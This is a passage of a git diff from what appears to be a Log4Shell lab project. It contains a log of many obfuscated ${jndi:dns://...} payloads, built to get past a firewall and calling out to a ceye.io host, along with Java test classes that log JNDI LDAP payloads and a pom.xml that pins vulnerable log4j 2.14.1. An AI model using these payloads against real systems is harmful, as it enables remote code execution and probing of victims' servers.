com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:03:50 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dWfi%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:03:50 ERROR com.example.spring.controller.IndexController - Hello, ${jndi:dns://0${::-.}get${::-.}127${::-.}0${::-.}0${::-.}1${::-.}8005${::-.}Wfi${::-.}hpdth2${::-.}ceye${::-.}io/ user} +2025-12-08 14:05:06 INFO com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:05:06 INFO com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:05:06 ERROR com.example.spring.controller.IndexController - Hello, World +2025-12-08 14:06:35 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:06:35 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7b::-n%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dTOn%24%7b::-.%7d2%24%7b::-.%7d1%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dTVK%24%7b::-.%7d2%24%7b::-.%7d0%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36n%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dTOn$%7b::-.%7d3$%7b::-.%7d1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:07:16 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dTVK$%7b::-.%7d3$%7b::-.%7d0$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:11:28 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:11:28 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:11:34 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:11:34 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:11:48 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:11:48 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:13:12 ERROR com.example.spring.controller.IndexController - Referer: 127 +2025-12-08 14:13:12 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:13:30 ERROR com.example.spring.controller.IndexController - Referer: 127 +2025-12-08 14:13:30 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:21:27 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:21:27 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:21:33 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:21:33 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.dzu3.hpdth2.ceye.io/user} +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.ldY20.hpdth2.ceye.io/user} +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.YGL21.hpdth2.ceye.io/user} +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.ldY30.hpdth2.ceye.io/user} +2025-12-08 14:24:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.YGL31.hpdth2.ceye.io/user} +2025-12-08 14:27:10 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:10 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7deCv%24%7b::-.%7d2%24%7b::-.%7d0%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jn%24%7benv::-%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dSmj%24%7b::-.%7d2%24%7b::-.%7d2%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36n%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dMZw$%7b::-.%7d3$%7b::-.%7d1$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7b::-n%7ddi:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dMZw%24%7b::-.%7d2%24%7b::-.%7d1%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%7ddi:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dSmj$%7b::-.%7d3$%7b::-.%7d2$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24%7bsys:k5:-nD%7d%24%7blower:i%24%7bweb:k5:-:%7d%7ddns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7d98G%24%7b::-.%7d2%24%7b::-.%7d3%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36nD%7d$%7blower:i$%7bweb:k5:-:%7d%7ddns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7d98G$%7b::-.%7d3$%7b::-.%7d3$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{%24{%24{::-j}%24{::-n}%24{::-d}%24{::-i}:dns://1%24%7b::-.%7dget%24%7b::-.%7d127%24%7b::-.%7d0%24%7b::-.%7d0%24%7b::-.%7d1%24%7b::-.%7d8005%24%7b::-.%7dMds%24%7b::-.%7d2%24%7b::-.%7d4%24%7b::-.%7dhpdth2%24%7b::-.%7dceye%24%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${${${::-j}${::-n}${::-d}${::-i}:dns://1$%7b::-.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7dMds$%7b::-.%7d3$%7b::-.%7d4$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user} +2025-12-08 14:27:25 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36.%7dget$%7b::-.%7d127$%7b::-.%7d0$%7b::-.%7d0$%7b::-.%7d1$%7b::-.%7d8005$%7b::-.%7deCv$%7b::-.%7d3$%7b::-.%7d0$%7b::-.%7dhpdth2$%7b::-.%7dceye$%7b::-.%7dio/%20user +2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.2Wf20.hpdth2.ceye.io/%20user} +2025-12-08 14:28:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.2Wf30.hpdth2.ceye.io/%20user} +2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.Ue320.hpdth2.ceye.io/%20user} +2025-12-08 14:29:11 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.Ue330.hpdth2.ceye.io/%20user} +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.Q0a21.hpdth2.ceye.io/ user} +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.49C20.hpdth2.ceye.io/ user} +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.49C30.hpdth2.ceye.io/ user} +2025-12-08 14:30:19 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.Q0a31.hpdth2.ceye.io/ user} +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.T3s21.hpdth2.ceye.io/ user} +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.De620.hpdth2.ceye.io/ user} +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.De630.hpdth2.ceye.io/ user} +2025-12-08 14:31:15 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.T3s31.hpdth2.ceye.io/ user} +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.cKd20.hpdth2.ceye.io/ user} +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.ShD21.hpdth2.ceye.io/ user} +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.cKd30.hpdth2.ceye.io/ user} +2025-12-08 14:31:41 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.ShD31.hpdth2.ceye.io/ user} +2025-12-08 14:32:58 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:32:58 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:33:04 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:33:04 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.r8P3.hpdth2.ceye.io/ user} +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://2.get.127.0.0.1.8005.OPY20.hpdth2.ceye.io/ user} +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://2.get.127.0.0.1.8005.ewP21.hpdth2.ceye.io/ user} +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://2.get.127.0.0.1.8005.OPY30.hpdth2.ceye.io/ user} +2025-12-08 14:33:53 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://2.get.127.0.0.1.8005.ewP31.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :%24{jndi:dns://2.get.127.0.0.1.8005.81P20.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :%24{j%24{::-n}di:dns://2.get.127.0.0.1.8005.apc21.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{jndi:dns://1.get.127.0.0.1.8005.81P20.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36%24{j%24{::-n}di:dns://1.get.127.0.0.1.8005.apc21.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :${jndi:dns://2.get.127.0.0.1.8005.81P30.hpdth2.ceye.io/ user} +2025-12-08 14:34:37 ERROR com.example.spring.controller.IndexController - Referer: :${j${::-n}di:dns://2.get.127.0.0.1.8005.apc31.hpdth2.ceye.io/ user} +2025-12-08 14:34:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.81P30.hpdth2.ceye.io/ user} +2025-12-08 14:34:38 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${j${::-n}di:dns://1.get.127.0.0.1.8005.apc31.hpdth2.ceye.io/ user} +2025-12-08 14:35:36 ERROR com.example.spring.controller.IndexController - Referer: null +2025-12-08 14:35:36 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +2025-12-08 14:35:42 ERROR com.example.spring.controller.IndexController - Referer: :${jndi:dns://2.get.127.0.0.1.8005.1rk3.hpdth2.ceye.io/ user} +2025-12-08 14:35:43 ERROR com.example.spring.controller.IndexController - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36${jndi:dns://1.get.127.0.0.1.8005.1rk3.hpdth2.ceye.io/ user} diff --git a/JNDI/Log4j2/pom.xml b/JNDI/Log4j2/pom.xml new file mode 100644 index 0000000..4440633 --- /dev/null +++ b/JNDI/Log4j2/pom.xml @@ -0,0 +1,44 @@ + + + 4.0.0 + + com.test + Log4j2 + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + 2.14.1 + 2.15.0 + + + + + org.apache.logging.log4j + log4j-core + ${log4j2.version1} + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + org.springframework.boot + spring-boot-starter-logging + + + + + org.aspectj + aspectjweaver + 1.9.4 + + + + + \ No newline at end of file diff --git a/JNDI/Log4j2/src/main/java/com/example/App.java b/JNDI/Log4j2/src/main/java/com/example/App.java new file mode 100644 index 0000000..469545a --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/App.java @@ -0,0 +1,35 @@ +package com.example; + +import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; +import org.apache.logging.log4j.core.config.Configurator; + +public class App { + private static final Logger logger = LogManager.getLogger(App.class); + + public static void main(String[] args) { + /* 临时修改记录的日志等级 */ + Configurator.setLevel("com.example.App", Level.DEBUG); + + String username = "${sys:user.name}"; + String str2 = "${sys:java.version}"; + String vul = "${jndi:ldap://127.0.0.1:50389/b67a28}"; + vul = "${jndi:ldap://127.0.0.1:50389/7df78d}"; +// logger.trace("跟踪信息"); +// logger.debug("调试信息"); +// logger.info("应用启动"); +// logger.warn("警告示例"); +// logger.error("错误示例"); +// logger.fatal("致命错误示例"); +// logger.trace("{}", username); +// logger.info("{}", str2); + logger.info("{}", vul); +// logger.error("{}",vul); + try { + int x = 1 / 0; + } catch (Exception e) { + logger.error("发生异常", e); + } + } +} diff --git a/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java b/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java new file mode 100644 index 0000000..7232598 --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/BypassWaf.java @@ -0,0 +1,31 @@ +package com.example; + +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + + +public class BypassWaf { + private static final Logger logger = LogManager.getLogger(BypassWaf.class); + + public static void main(String[] args) { +// String test5 = "${a:\\-b}"; +// logger.error("{}", test5); +// String test2 = "${a:\\-b123:-xyz}"; +// logger.error("{}", test2); +// String test4 = "${a:\\-b123:-xyz:-qwe}"; +// logger.error("{}", test4); +// String test3 = "${a:-b}"; +// logger.error("{}", test3); +// String test6 = "${a:-b123:-xyz}"; +// logger.error("{}", test6); +// String test7 = "${a:b123:-xyz321:-qwe}"; +// logger.error("{}", test7); +// String test8 = "${sys:java.version:-xyz123}"; +// logger.error("{}", test8); +// String test1 = "${sys:${a:-j${proto:-a}va.version}}${d:e}"; +// logger.fatal("{}", test1); + String host = "ldap://127.0.0.1:50389/b67a28"; + String vul1 = String.format("${jndi:%s}", host); + logger.error("{}", vul1); + } +} diff --git a/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java b/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java new file mode 100644 index 0000000..bb2acba --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/spring/WebApplication.java @@ -0,0 +1,11 @@ +package com.example.spring; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class WebApplication { + public static void main(String[] args) { + SpringApplication.run(WebApplication.class, args); + } +} diff --git a/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java b/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java new file mode 100644 index 0000000..955ae0f --- /dev/null +++ b/JNDI/Log4j2/src/main/java/com/example/spring/controller/IndexController.java @@ -0,0 +1,31 @@ +package com.example.spring.controller; + +import com.example.App; +import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; +import org.apache.logging.log4j.core.config.Configurator; +import org.springframework.stereotype.Controller; +import org.springframework.web.bind.annotation.RequestMapping; +import org.springframework.web.bind.annotation.RequestParam; +import org.springframework.web.bind.annotation.ResponseBody; + +import javax.servlet.http.HttpServletRequest; + +@Controller +public class IndexController { + private static final Logger logger = LogManager.getLogger(IndexController.class); + + @RequestMapping("/") + @ResponseBody + public String index(@RequestParam(value = "name", defaultValue = "World") String name, HttpServletRequest request) { + 